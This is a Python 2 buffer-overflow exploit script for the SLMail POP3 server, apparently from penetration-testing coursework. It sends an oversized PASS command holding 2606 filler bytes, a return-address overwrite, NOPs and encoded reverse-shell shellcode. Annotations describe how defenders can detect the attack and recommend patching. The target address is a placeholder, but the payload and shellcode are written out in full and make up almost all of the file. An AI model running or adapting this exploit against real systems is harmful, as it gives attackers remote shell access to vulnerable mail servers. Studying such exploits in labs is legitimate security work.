pwkBOF.py
#!/usr/bin/python
# BoF for SLMail
# Original PoC from Offensive Security
# IP address is hard-coded
#
# Python 2 script (print statements, byte-oriented str literals); it will not
# run unmodified under Python 3.  Top to bottom it opens one TCP connection,
# completes the POP3 USER step, then sends a PASS argument built from 2606
# filler bytes, a 4-byte value, eight 0x90 bytes and the shellcode below.
#
# Defender's view: the whole payload travels in a single cleartext POP3 PASS
# command over port 110, so a POP3 password field of several kilobytes --
# most of it the byte 0x41 ('A') -- is a high-confidence indicator for this
# class of attack in packet captures and IDS/IPS logs.  The mitigation is to
# patch or retire the affected mail-server build and keep POP3 off untrusted
# networks.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Shellcode is a reverse TCP shell, encoded with x86 Shikata ga nai
# (per the author's note; the bytes are opaque here and the callback
# destination is not recoverable from this listing).
shellcode = ("\xb8\xb4\x46\xeb\xdb\xdd\xc7\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x31\x46\x12\x83\xc6\x04\x03\xf2\x48\x09\x2e\x06\xbc\x4f"
"\xd1\xf6\x3d\x30\x5b\x13\x0c\x70\x3f\x50\x3f\x40\x4b\x34\xcc"
"\x2b\x19\xac\x47\x59\xb6\xc3\xe0\xd4\xe0\xea\xf1\x45\xd0\x6d"
"\x72\x94\x05\x4d\x4b\x57\x58\x8c\x8c\x8a\x91\xdc\x45\xc0\x04"
"\xf0\xe2\x9c\x94\x7b\xb8\x31\x9d\x98\x09\x33\x8c\x0f\x01\x6a"
"\x0e\xae\xc6\x06\x07\xa8\x0b\x22\xd1\x43\xff\xd8\xe0\x85\x31"
"\x20\x4e\xe8\xfd\xd3\x8e\x2d\x39\x0c\xe5\x47\x39\xb1\xfe\x9c"
"\x43\x6d\x8a\x06\xe3\xe6\x2c\xe2\x15\x2a\xaa\x61\x19\x87\xb8"
"\x2d\x3e\x16\x6c\x46\x3a\x93\x93\x88\xca\xe7\xb7\x0c\x96\xbc"
"\xd6\x15\x72\x12\xe6\x45\xdd\xcb\x42\x0e\xf0\x18\xff\x4d\x9d"
"\xed\x32\x6d\x5d\x7a\x44\x1e\x6f\x25\xfe\x88\xc3\xae\xd8\x4f"
"\x23\x85\x9d\xdf\xda\x26\xde\xf6\x18\x72\x8e\x60\x88\xfb\x45"
"\x70\x35\x2e\xc9\x20\x99\x81\xaa\x90\x59\x72\x43\xfa\x55\xad"
"\x73\x05\xbc\xc6\x1e\xfc\x57\xe3\xd5\xfe\x53\x9b\xeb\xfe\x9a"
"\xe7\x65\x18\xf6\x07\x20\xb3\x6f\xb1\x69\x4f\x11\x3e\xa4\x2a"
"\x11\xb4\x4b\xcb\xdc\x3d\x21\xdf\x89\xcd\x7c\xbd\x1c\xd1\xaa"
"\xa9\xc3\x40\x31\x29\x8d\x78\xee\x7e\xda\x4f\xe7\xea\xf6\xf6"
"\x51\x08\x0b\x6e\x99\x88\xd0\x53\x24\x11\x94\xe8\x02\x01\x60"
"\xf0\x0e\x75\x3c\xa7\xd8\x23\xfa\x11\xab\x9d\x54\xcd\x65\x49"
"\x20\x3d\xb6\x0f\x2d\x68\x40\xef\x9c\xc5\x15\x10\x10\x82\x91"
"\x69\x4c\x32\x5d\xa0\xd4\x52\xbc\x60\x21\xfb\x19\xe1\x88\x66"
"\x9a\xdc\xcf\x9e\x19\xd4\xaf\x64\x01\x9d\xaa\x21\x85\x4e\xc7"
"\x3a\x60\x70\x74\x3a\xa1")
# Payload layout: 2606 filler bytes (the author's offset), a 4-byte value
# (presumably the return-address overwrite from the original PoC -- not
# verifiable from this file alone), eight x86 NOPs (0x90), then the shellcode.
buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
try:
    print "Sending evil buffer..."
    # '<ip address>' is a literal placeholder: as written the connect() call
    # fails on name resolution and control falls through to the except below.
    # The `connect` name is assigned but never read.
    connect = s.connect(('<ip address>',110))
    data = s.recv(1024)   # server greeting; discarded
    s.send('USER username' + '\r\n')
    data = s.recv(1024)   # USER response; discarded, not checked for +OK
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!"
except:
    # Bare except: every failure (resolution, refused connection, reset
    # mid-send, KeyboardInterrupt) prints the same message and the socket
    # is never closed, so the cause of an error is not distinguishable here.
    print "Could not connect to POP3"